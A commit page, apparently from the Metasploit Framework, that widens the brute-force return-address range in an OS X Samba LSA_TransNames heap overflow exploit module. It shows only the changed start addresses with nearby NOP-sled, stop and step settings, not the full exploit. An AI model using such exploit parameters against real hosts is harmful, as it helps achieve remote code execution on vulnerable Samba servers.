Increase the brute force range (thanks toto_)
git-svn-id: file:///home/svn/framework3/trunk@5032 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
735c0b5d4e
commit
febc0feb28
|
@ -55,7 +55,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
|
|||
'Nops' => 4 * 1024,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
'Start' => { 'Ret' => 0x0181c000 },
|
||||
'Start' => { 'Ret' => 0x01813000 },
|
||||
'Stop' => { 'Ret' => 0x01820000 },
|
||||
'Step' => 256,
|
||||
},
|
||||
|
@ -74,7 +74,7 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
|
|||
'Nops' => 1600,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
'Start' => { 'Ret' => 0x0181c000 },
|
||||
'Start' => { 'Ret' => 0x01813000 },
|
||||
'Stop' => { 'Ret' => 0x01830000 },
|
||||
'Step' => 796,
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue